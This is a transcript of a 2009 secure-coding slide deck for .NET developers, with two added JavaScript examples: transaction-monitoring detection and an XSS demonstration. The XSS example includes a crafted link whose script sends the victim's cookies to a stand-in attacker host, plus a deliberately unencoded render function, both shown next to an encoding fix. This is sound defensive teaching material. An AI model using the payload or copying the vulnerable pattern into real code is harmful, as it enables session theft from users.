Writing Secure Code By Sam Nasr, MCAD, MCT, MCTS March 18, 2009.

1 Writing Secure Code By Sam Nasr, MCAD, MCT, MCTS March 18, 2009

2 Agenda Introduction Security overview Security Procedural Coding Q&A

3 About me… Sam Nasr Independent Software Consultant Nasr Information Systems Software developer since 1995 MCAD, MCT, MCTS(WSS/MOSS) President - Cleveland C#/VB.Net User Group Contact Info E-mail: sam@nasr.info Blog: ClevelandDotNet.blogspot.com/

4 Setting Expectations. What will be covered: overview of security in the .Net Framework; some coding techniques (limited by time); a take-home laundry list; a discussion of code and organizational policies. What will NOT be covered: COM and ActiveX; DB security; identifying security bugs.

5 Why Security? Protect the data: credit card numbers, corporate data (financial info), patient information. Ensure app integrity: prevent loss of revenue (e.g. client-side price tampering that yields $1 plane tickets); uptime (DoS attacks). Ensure app authenticity: customers run the intended application, not a tampered copy.

6 What are the odds? One developer vs. many hackers. One developer hour vs. many hacker hours. Salary vs. personal pride. A focused effort vs. continuous attempts.

7 Points of Entry

8 Holistic Security Physical Location of servers ALL servers (App & DB) must be configured for security Train users against social engineering Security code review Security Testing Practice Active Defense Recovery Plan Keep your users aware of the security risk


11 Active Defense. Monitor for: out-of-bounds pricing (a sale far below list price), an excessive number of transactions from one account, after-hours access, and extended login times.
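The four monitoring rules on this slide, written out as detection logic over a constructed transaction log. This is an added example, not code from the presentation; the record fields, the reference prices and every threshold in POLICY are assumptions chosen for illustration, and it is written for Node.js rather than .Net to keep it self-contained.

```javascript
'use strict';

// Reference list prices for the out-of-bounds check (constructed sample data).
const CATALOG_PRICES = { 'CLE-LAX': 350.0, 'CLE-NYC': 220.0 };

// Policy thresholds. All values are assumptions for the example.
const POLICY = {
  minPriceRatio: 0.5,                      // paid < 50% of list price is suspect
  maxTxPerHour: 5,                         // more than this per user per hour is suspect
  businessHoursUtc: { start: 8, end: 18 }, // [start, end) in UTC
  maxSessionMinutes: 12 * 60,              // a login longer than 12h is suspect
};

// Apply the four rules to one transaction. `priorInLastHour` is how many
// transactions the same user already made in the preceding hour.
function evaluateTransaction(tx, priorInLastHour) {
  const flags = [];
  const listPrice = CATALOG_PRICES[tx.route];
  if (listPrice !== undefined && tx.paid < listPrice * POLICY.minPriceRatio) {
    flags.push('out_of_bounds_price');
  }
  if (priorInLastHour >= POLICY.maxTxPerHour) {
    flags.push('excessive_transactions');
  }
  const hour = new Date(tx.ts).getUTCHours();
  if (hour < POLICY.businessHoursUtc.start || hour >= POLICY.businessHoursUtc.end) {
    flags.push('after_hours_access');
  }
  if (tx.sessionMinutes > POLICY.maxSessionMinutes) {
    flags.push('extended_login');
  }
  return flags;
}

// Walk a time-ordered log and return one alert per flagged record.
// A per-user sliding one-hour window feeds the transaction-count rule.
function monitor(log) {
  const alerts = [];
  const recent = new Map(); // user -> timestamps (ms) of that user's transactions
  for (const tx of log) {
    const t = Date.parse(tx.ts);
    const window = (recent.get(tx.user) || []).filter((x) => t - x < 60 * 60 * 1000);
    const flags = evaluateTransaction(tx, window.length);
    if (flags.length > 0) alerts.push({ id: tx.id, user: tx.user, flags });
    window.push(t);
    recent.set(tx.user, window);
  }
  return alerts;
}

// Constructed sample log: one record per rule, plus a burst of six bookings
// from one user inside a single hour (only the sixth trips the count rule).
const SAMPLE_LOG = [
  { id: 'tx1', user: 'alice', route: 'CLE-LAX', paid: 1.0,   ts: '2009-03-18T14:05:00Z', sessionMinutes: 30 },
  { id: 'tx2', user: 'bob',   route: 'CLE-NYC', paid: 220.0, ts: '2009-03-18T02:10:00Z', sessionMinutes: 20 },
  { id: 'tx3', user: 'carol', route: 'CLE-NYC', paid: 220.0, ts: '2009-03-18T10:00:00Z', sessionMinutes: 900 },
  ...Array.from({ length: 6 }, (_, i) => ({
    id: `tx${4 + i}`, user: 'dave', route: 'CLE-NYC', paid: 220.0,
    ts: `2009-03-18T09:0${i}:00Z`, sessionMinutes: 10,
  })),
];

for (const a of monitor(SAMPLE_LOG)) {
  console.log(`${a.id} ${a.user}: ${a.flags.join(', ')}`);
}
```

Running it prints four alerts: tx1 (the $1 ticket), tx2 (a 02:10 UTC purchase), tx3 (a 15-hour session) and tx9 (dave's sixth booking within the hour). In a real deployment the thresholds belong in configuration, the business-hours check needs the customer's time zone, and the alerts should be written to a log that the attacker cannot edit.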

12 .Net 101 (know the basics). What does the compiler produce? How does the code execute? How is the JIT used? How is the CLR used?

13 Security Namespaces System.Security System.Web.Security System.Security.Cryptography System.Security.Principal System.Security.Policy System.Security.Permissions

14 Demo ILDASM/ILASM

15 Security Tools DotFuscator FX Cop Anti-Cross Site Scripting Library Security Assessment Tool

16 Strong Names. A strong name binds an assembly to a public/private key pair and consists of: the simple name (BookInventory), the version number (1.0.0.0), the culture (neutral), and the public key token (derived from the public key). Note: protect the private key. Use AssemblyDelaySign so that day-to-day builds only embed the public key and the private key is applied once, at final signing, by whoever holds it.

17 Demo Strong Names

18 Anti-Cross Site Scripting Library. A cross-site scripting (XSS) attack: a hacker places a link in an e-mail or web forum that appears to point to a legitimate site (e.g. cnn.com, google.com), but one of the URL's parameters actually carries malicious script code. When an unsuspecting user clicks the link, the site echoes that parameter into its page without encoding it, and the script runs in the victim's browser with the privileges of the trusted site (its cookies, session and page contents). The script may be used to send cookies from the victim's PC to the hacker's machine; the cookies may contain session identifiers, user IDs, passwords, or possibly credit card information, all of which can be used for illegal purposes. The Anti-XSS library encodes untrusted output for the context it is written into (HTML body, attribute, JavaScript, URL) so that the browser renders it as text rather than markup. http://www.microsoft.com/downloads/details.aspx?familyid=9A2B9C92-7AD9-496C-9A89-AF08DE2E5982&displaylang=en
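The attack on this slide, end to end, as an added example that is not part of the presentation and not the Anti-XSS library's own code: a constructed attacker link whose search parameter carries a cookie-stealing script, a search page that echoes the parameter unencoded, and the same page with an encoder written on the library's "principle of inclusions" (only known-safe characters pass; everything else becomes a character reference). The URL, the site name and the function names are assumptions, and the code is Node.js rather than the library's C#.

```javascript
'use strict';

// Constructed attacker link. The q parameter is URL-encoded script that ships
// the victim's cookies to a host the attacker controls.
const MALICIOUS_URL =
  'http://www.example.com/search?q=' +
  '%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3F%27' +
  '%2Bdocument.cookie%3C%2Fscript%3E';

// Read one query parameter the way a server-side handler would (decoded).
function queryParam(url, name) {
  return new URL(url).searchParams.get(name) || '';
}

// VULNERABLE: the untrusted parameter is concatenated straight into HTML,
// so whatever markup it contains becomes part of the page.
function renderVulnerable(q) {
  return `<p>Results for: ${q}</p>`;
}

// Encoder for HTML element content on the "principle of inclusions":
// letters, digits, space and a few punctuation marks pass through; every
// other character is written as a decimal character reference, so no input
// can open a tag, close one, or start an entity.
function htmlEncode(input) {
  let out = '';
  for (const ch of String(input)) { // iterates code points, not UTF-16 units
    if (/^[A-Za-z0-9 ,.\-_]$/.test(ch)) out += ch;
    else out += `&#${ch.codePointAt(0)};`;
  }
  return out;
}

// HARDENED: identical page, but the parameter is encoded on output.
function renderSafe(q) {
  return `<p>Results for: ${htmlEncode(q)}</p>`;
}

// The check an attacker's payload must pass to run: is there a live tag?
function containsScriptTag(html) {
  return /<script/i.test(html);
}

const q = queryParam(MALICIOUS_URL, 'q');
console.log('decoded parameter :', q);
console.log('vulnerable page   :', renderVulnerable(q));
console.log('hardened page     :', renderSafe(q));
```

The hardened output contains the attacker's text verbatim as far as the user can see, but the browser receives `&#60;script&#62;` and renders it as characters, so nothing executes. Two caveats a practitioner should keep in mind: the encoder above is only correct for HTML element content (an attribute value, a JavaScript string or a URL each need their own encoder, which is why the library ships HtmlEncode, HtmlAttributeEncode, JavaScriptEncode and UrlEncode as separate calls), and encoding must happen at output time, not on input, because the same stored value may be written into several different contexts.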

19 Demo FXCop

20 Demo Security Assessment Tool

21 Conclusion. Let's recap: procedural coding.

22 References
Understanding MSIL: www.ClevelandDotnet.info - Presentations
FXCop: http://www.microsoft.com/downloads/details.aspx?familyid=9AEAA970-F281-4FB0-ABA1-D59D7ED09772&displaylang=en
Securing connection strings via code: http://msdn.microsoft.com/en-us/library/89211k9b(VS.80).aspx
Securing connection strings via command line: http://msdn.microsoft.com/en-us/library/dx0f3cf2(VS.80).aspx

23 Questions?

24 Contact Info Sam Nasr E-mail: sam@nasr.info Blog: ClevelandDotNet.blogspot.com/ Cleveland C#/VB.Net User Group Web: www.ClevelandDotNet.info

